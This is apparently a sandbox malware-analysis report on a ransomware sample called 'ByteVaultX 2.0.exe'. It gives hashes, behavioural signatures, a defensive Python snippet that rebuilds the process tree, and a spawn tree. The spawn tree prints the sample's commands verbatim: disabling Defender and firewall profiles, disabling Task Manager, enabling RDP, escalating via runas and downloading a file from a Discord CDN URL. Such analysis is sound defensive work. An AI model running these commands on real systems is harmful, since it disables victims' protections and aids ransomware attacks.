Analysis
max time kernel: 931s
max time network: 1035s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 25/05/2024, 23:42
Behavioral task behavioral1: Sample ByteVaultX 2.0.exe, Resource win10-20240404-en
Behavioral task behavioral2: Sample ByteVaultX 2.0.exe, Resource win10v2004-20240508-en
Behavioral task behavioral3: Sample ByteVaultX 2.0.exe, Resource win11-20240426-en
General
Target: ByteVaultX 2.0.exe
Size: 9.9MB
MD5: d4c033244c9bf694cf7063f136b01e30
SHA1: a460178565327d0a0b756d165ff0fa3aae5f7abe
SHA256: 1a21a8954832306df2f9ff1b2296fbee0a079b019d3ef511ef6ec278fa9084e5
SHA512: 78f267f14fa35e975237c877e3de5e5e918c7f80c622ba255429f5a92572aa84a49b233f0ef36d6c65409c3297bbe14a528608cc6a843d8dc14eec7a0b27d75d
SSDEEP: 196608:4h7iRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:hGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted: https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&
Extracted: C:\Encrypt\encrypt.html
Signatures
Renames multiple (132) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
Blocklisted process makes network request 31 IoCs
Disables Task Manager via registry modification
Modifies Windows Firewall 2 TTPs 64 IoCs
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation | ByteVaultX 2.0.exe
Loads dropped DLL 12 IoCs
pid | Process
2212 | ByteVaultX 2.0.exe (same entry repeated for all 12 IoCs)
Drops desktop.ini file(s) 8 IoCs
description | ioc | Process
File opened for modification | C:\Users\Admin\Desktop\desktop.ini | ByteVaultX 2.0.exe
File opened for modification | C:\Users\Admin\Music\desktop.ini | ByteVaultX 2.0.exe
File opened for modification | C:\Users\Admin\Videos\desktop.ini | ByteVaultX 2.0.exe
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | ByteVaultX 2.0.exe
File opened for modification | C:\Users\Admin\Documents\desktop.ini | ByteVaultX 2.0.exe
File opened for modification | C:\Users\Admin\Pictures\desktop.ini | ByteVaultX 2.0.exe
File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | ByteVaultX 2.0.exe
File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | ByteVaultX 2.0.exe
Sets desktop wallpaper using registry 2 TTPs 36 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" | reg.exe (same entry repeated for all 36 IoCs)
Drops file in Windows directory 4 IoCs
description | ioc | Process
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\1568373884.pri | MicrosoftEdgeCP.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Modifies registry class 64 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: MapViewOfSection 3 IoCs
pid | Process
224 | MicrosoftEdgeCP.exe (same entry repeated for all 3 IoCs)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process
4636 MicrosoftEdge.exe
224 MicrosoftEdgeCP.exe
1528 MicrosoftEdgeCP.exe
224 MicrosoftEdgeCP.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target | rows (identical rows collapsed; 64 rows in total)
PID 4972 wrote to memory of 2212 | 4972 | ByteVaultX 2.0.exe | 73 | 2
PID 2212 wrote to memory of 4616 | 2212 | ByteVaultX 2.0.exe | 74 | 2
PID 2212 wrote to memory of 2564 | 2212 | ByteVaultX 2.0.exe | 78 | 2
PID 2212 wrote to memory of 1968 | 2212 | ByteVaultX 2.0.exe | 80 | 2
PID 2212 wrote to memory of 4292 | 2212 | ByteVaultX 2.0.exe | 84 | 2
PID 4292 wrote to memory of 2696 | 4292 | cmd.exe | 87 | 2
PID 4292 wrote to memory of 1604 | 4292 | cmd.exe | 89 | 2
PID 4292 wrote to memory of 1252 | 4292 | cmd.exe | 91 | 2
PID 4292 wrote to memory of 1932 | 4292 | cmd.exe | 92 | 2
PID 4292 wrote to memory of 1232 | 4292 | cmd.exe | 93 | 2
PID 224 wrote to memory of 796 | 224 | MicrosoftEdgeCP.exe | 90 | 4
PID 4292 wrote to memory of 1456 | 4292 | cmd.exe | 94 | 2
PID 4292 wrote to memory of 4516 | 4292 | cmd.exe | 95 | 2
PID 4292 wrote to memory of 3344 | 4292 | cmd.exe | 96 | 2
PID 4292 wrote to memory of 4592 | 4292 | cmd.exe | 97 | 2
PID 4292 wrote to memory of 3708 | 4292 | cmd.exe | 98 | 2
PID 4292 wrote to memory of 2732 | 4292 | cmd.exe | 99 | 2
PID 4292 wrote to memory of 4588 | 4292 | cmd.exe | 100 | 2
PID 4292 wrote to memory of 5096 | 4292 | cmd.exe | 101 | 2
PID 4292 wrote to memory of 4856 | 4292 | cmd.exe | 102 | 2
PID 4292 wrote to memory of 668 | 4292 | cmd.exe | 118 | 2
PID 4292 wrote to memory of 4860 | 4292 | cmd.exe | 104 | 2
PID 4292 wrote to memory of 3652 | 4292 | cmd.exe | 105 | 2
PID 4292 wrote to memory of 2220 | 4292 | cmd.exe | 106 | 2
PID 4292 wrote to memory of 4572 | 4292 | cmd.exe | 107 | 2
PID 4292 wrote to memory of 1856 | 4292 | cmd.exe | 108 | 2
PID 4292 wrote to memory of 932 | 4292 | cmd.exe | 109 | 2
PID 4292 wrote to memory of 2624 | 4292 | cmd.exe | 110 | 2
PID 4292 wrote to memory of 4268 | 4292 | cmd.exe | 149 | 2
PID 4292 wrote to memory of 416 | 4292 | cmd.exe | 127 | 2
PID 416 wrote to memory of 1932 | 416 | powershell.exe | 114 | 2
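The "wrote to memory of" rows above are how this sandbox records process creation (the parent writes the child's start-up data immediately after CreateProcess), so the table doubles as a parent/child edge list and is not evidence of injection. The following Python, added here as an example and not part of the report, rebuilds the spawn chain from an excerpt of those rows. It keys processes by the procid_target column rather than by PID, because PIDs are recycled within the run (1932 is a reg.exe child of 4292 at target 92 and later the cmd.exe child of 416 at target 114); the fan-out threshold of five is an arbitrary choice for the example.

```python
"""Rebuild the spawn tree from the report's WriteProcessMemory rows.

Added example, not part of the sandbox report.  A "PID A wrote to memory of B"
row is the parent writing start-up data into a child it just created, so each
row is a parent -> child edge.  Nodes are keyed by procid_target (the sandbox's
unique process index) because PIDs are recycled during the run.  ROWS is an
excerpt copied from the report (the Edge rows are left out).
"""
import re
from collections import defaultdict

ROWS = """\
PID 4972 wrote to memory of 2212 4972 ByteVaultX 2.0.exe 73
PID 2212 wrote to memory of 4616 2212 ByteVaultX 2.0.exe 74
PID 2212 wrote to memory of 4292 2212 ByteVaultX 2.0.exe 84
PID 4292 wrote to memory of 2696 4292 cmd.exe 87
PID 4292 wrote to memory of 1932 4292 cmd.exe 92
PID 4292 wrote to memory of 1232 4292 cmd.exe 93
PID 4292 wrote to memory of 1456 4292 cmd.exe 94
PID 4292 wrote to memory of 4588 4292 cmd.exe 100
PID 4292 wrote to memory of 4588 4292 cmd.exe 100
PID 4292 wrote to memory of 416 4292 cmd.exe 127
PID 416 wrote to memory of 1932 416 powershell.exe 114
"""

# description | pid | Process | procid_target; the parent PID appears twice per row
ROW_RE = re.compile(
    r"^PID (?P<parent>\d+) wrote to memory of (?P<child>\d+) "
    r"(?P=parent) (?P<image>.+?) (?P<target>\d+)$"
)

ROOT = 0  # synthetic node for the first ByteVaultX process, which has no row of its own


def parse_rows(text):
    """Return (parent_pid, child_pid, parent_image, child_node) per row; duplicates kept."""
    edges = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.append((int(m["parent"]), int(m["child"]), m["image"], int(m["target"])))
    return edges


def build_tree(edges, root_pid):
    """Return (pid_of, image_of, parent, children), all keyed by node id."""
    latest = {root_pid: ROOT}            # pid -> most recently created node with that pid
    pid_of, image_of = {ROOT: root_pid}, {}
    parent, children = {}, defaultdict(list)
    for ppid, cpid, pimage, node in edges:
        pnode = latest.get(ppid)
        if pnode is None:                # parent never seen (e.g. the Edge rows): skip
            continue
        image_of[pnode] = pimage         # a row names the parent's image, not the child's
        if node in pid_of:               # second write into the same child
            continue
        pid_of[node] = cpid
        parent[node] = pnode
        children[pnode].append(node)
        latest[cpid] = node              # from here on this pid means the new process
    return pid_of, image_of, parent, children


def root_chain(pid_of, parent, node):
    """PIDs from the root down to `node`, e.g. [4972, 2212, 4292, 416, 1932]."""
    chain = [node]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return [pid_of[n] for n in reversed(chain)]


def fan_out(children, pid_of, image_of, threshold=5):
    """Parents with at least `threshold` distinct children: a batch script
    firing off reg/netsh/powershell helpers looks exactly like this."""
    return {
        n: (pid_of[n], image_of.get(n, "?"), len(kids))
        for n, kids in children.items()
        if len(kids) >= threshold
    }


if __name__ == "__main__":
    pid_of, image_of, parent, children = build_tree(parse_rows(ROWS), 4972)
    for node in sorted(pid_of):
        if node != ROOT:
            print(" -> ".join(map(str, root_chain(pid_of, parent, node))))
    print(fan_out(children, pid_of, image_of))
```

On the full 64-row table the same code yields 24 distinct children under the cmd.exe at target 84, all of them reg.exe, netsh.exe or powershell.exe one-shots.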
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4616
-
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:2564
-
-
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵PID:1968
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵PID:2696
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵PID:1604
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵PID:1252
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵PID:1932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4592
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵PID:3708
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵PID:4588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵PID:4856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵PID:668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵PID:4860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:416 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵PID:4196
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵PID:1380
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵PID:3244
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵PID:4168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:4128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵PID:5048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:4040
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵PID:416
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵PID:4856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
PID:4512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵PID:804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵PID:4416
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵PID:3872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵PID:3544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵PID:2488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵PID:5000
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵PID:3944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵PID:4956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:4928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵PID:1252
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵
- Command and Scripting Interpreter: PowerShell
PID:4484 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵PID:4492
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵PID:3340
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵PID:4268
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵PID:4532
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵PID:3944
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵
- Modifies Windows Firewall
PID:1792
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵
- Modifies Windows Firewall
PID:4512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵PID:3864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵PID:1748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵PID:1572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵PID:2988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵PID:4152
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:3336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"8⤵
- Blocklisted process makes network request
PID:4572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"8⤵
- Command and Scripting Interpreter: PowerShell
PID:3320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"9⤵PID:208
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"10⤵PID:2012
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f10⤵PID:320
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"10⤵PID:3384
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f10⤵PID:2988
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:1628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵PID:2220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:3008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable10⤵
- Modifies Windows Firewall
PID:4864
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE10⤵PID:2812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off10⤵PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off10⤵
- Modifies Windows Firewall
PID:1840
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off10⤵PID:4656
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off10⤵PID:4980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off10⤵
- Modifies Windows Firewall
PID:4584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"10⤵PID:2060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"10⤵PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"10⤵
- Command and Scripting Interpreter: PowerShell
PID:2524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"10⤵PID:4632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"10⤵PID:4904
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"10⤵PID:4784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"10⤵
- Blocklisted process makes network request
PID:320
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"10⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
PID:4532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"11⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"12⤵PID:4208
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f12⤵PID:4296
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"12⤵PID:4592
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f12⤵PID:4180
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"12⤵PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"12⤵PID:3240
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"12⤵
- Command and Scripting Interpreter: PowerShell
PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"12⤵PID:3544
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable12⤵PID:5096
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE12⤵
- Modifies Windows Firewall
PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off12⤵PID:1252
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off12⤵PID:1456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off12⤵PID:4208
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off12⤵PID:3944
-
-
